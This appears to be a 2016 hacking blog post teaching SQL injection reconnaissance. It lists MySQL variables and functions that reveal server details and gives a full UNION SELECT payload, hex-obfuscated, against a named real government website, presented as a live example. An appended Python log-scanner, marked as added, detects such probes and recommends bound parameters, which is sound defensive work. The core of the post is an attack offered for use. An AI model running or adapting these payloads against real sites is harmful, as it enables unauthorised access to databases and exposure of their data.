Monday, May 30, 2016

Multiple Variables and Functions in SQL Injection

Today I want to discuss and share a little about the codes used to display variables and functions in SQL injection.

An example is shown in the image below. The purpose of these codes is to display several pieces of information about the target website.



  • @@port : Check port
  • @@version_compile_os : Check which operating system is running
  • @@CHARACTER_SET_FILESYSTEM : File system character set
  • @@version_compile_machine : Check 32-bit/64-bit
  • @@hostname : Current hostname
  • @@tmpdir : Temp directory
  • @@datadir : Data directory
  • @@version : Version of DB
  • @@basedir : Base directory
  • user() : Current user
  • database() : Current database
  • version() : Version
  • schema() : Current database
  • UUID() : System UUID key
  • current_user() : Current user
  • current_user : Current user
  • system_user() : Current system user
  • session_user() : Session user
  • @@GLOBAL.have_symlink : Check whether symlink is enabled or disabled
  • @@GLOBAL.have_ssl : Check whether it has SSL or not

To display them, use:

concat(@@version,0x3a,database()) < just an example :D


http://www.palembang.go.id/v1/detail/149 and false union select 1,2,3,concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x3c62723e,0x48756d616e2045646f2054656e7365693c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e64617461626173653d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,database(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e76657273696f6e3d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e757365723d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e506f72743d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@port,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4f533d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@version_compile_os,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e424954532044455441494c533d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d626c75653e,@@version_compile_machine,0x3c666f6e7420636f6c6f723d677265656e3e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e46494c452053595354454d3d3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,@@CHARACTER_SET_FILESYSTEM,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x686f73746e616d653d3d,@@hostname,0x3c62723e,0x53797374656d2075756964206b65793d3d,UUID(),0x3c62723e,0x73796d6c696e6b3d3d,@@GLOBAL.have_symlink,0x3c62723e,0x53534c3d3d,@@GLOBAL.have_ssl,0x3c62723e,0x426173656469726563746f72793d3d,@@basedir),5,6,7--/pemkot-palembang-budayakan-masyarakat-gemar-membaca-al-quran'

Live example :D

That's all for this tutorial, I hope it's useful.
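Added example, not part of the original post: on the defending side, the same list of variables and functions works as a detection signature, because normal page requests almost never contain them. This Python sketch URL-decodes the request target of each access-log line and alerts when it finds two or more of the listed names, or one of them together with UNION SELECT. The log lines, IP addresses, paths and the alert threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Names taken from the list in this post; matching is case-insensitive.
VARS = ("port", "version_compile_os", "character_set_filesystem",
        "version_compile_machine", "hostname", "tmpdir", "datadir", "version",
        "basedir", "global.have_symlink", "global.have_ssl")
FUNCS = ("user", "database", "version", "schema", "uuid",
         "current_user", "system_user", "session_user")

# Longest names first so @@version_compile_os is not reported as @@version.
VAR_RE = re.compile(r"@@(%s)\b" % "|".join(
    re.escape(v) for v in sorted(VARS, key=len, reverse=True)), re.I)
FUNC_RE = re.compile(r"\b(%s)\s*\(\s*\)" % "|".join(FUNCS), re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HEX_RE = re.compile(r"\b0x(?:[0-9a-f]{2})+\b", re.I)
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample access-log lines (documentation IPs, made-up paths).
SAMPLE_LOG = """\
192.0.2.10 - - [30/May/2016:10:00:01 +0700] "GET /detail/149 HTTP/1.1" 200 5120
192.0.2.44 - - [30/May/2016:10:00:07 +0700] "GET /detail/149%20and%20false%20union%20select%201,2,3,concat(@@version,0x3a,database()),5,6,7-- HTTP/1.1" 200 5301
192.0.2.17 - - [30/May/2016:10:00:09 +0700] "GET /search?q=current+user+guide HTTP/1.1" 200 2210
192.0.2.44 - - [30/May/2016:10:00:12 +0700] "GET /detail/149%20and%20false%20union%20select%201,2,3,concat(user(),0x3a,@@hostname,0x3a,@@version_compile_os),5,6,7-- HTTP/1.1" 200 5344
"""

def find_tokens(raw_target):
    """Return the sorted fingerprinting tokens found in one request target."""
    decoded = unquote_plus(raw_target)
    hits = {"@@" + v.lower() for v in VAR_RE.findall(decoded)}
    hits |= {f.lower() + "()" for f in FUNC_RE.findall(decoded)}
    if UNION_RE.search(decoded):
        hits.add("union select")
    if HEX_RE.search(decoded):
        hits.add("hex literal")
    return sorted(hits)

def is_probe(tokens):
    """Alert on two or more listed names, or one combined with UNION SELECT."""
    names = [t for t in tokens if t not in ("union select", "hex literal")]
    return len(names) >= 2 or (bool(names) and "union select" in tokens)

def scan_log(text):
    """Return (client_ip, tokens) for every log line that looks like a probe."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_probe(find_tokens(m.group(2))):
            alerts.append((m.group(1), find_tokens(m.group(2))))
    return alerts

if __name__ == "__main__":
    for ip, tokens in scan_log(SAMPLE_LOG):
        print(ip, tokens)
```

A signature like this only surfaces probing in the logs; the fix for the injection itself is to pass request values to the database as bound parameters instead of concatenating them into the query.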

#HumanEdoTensei
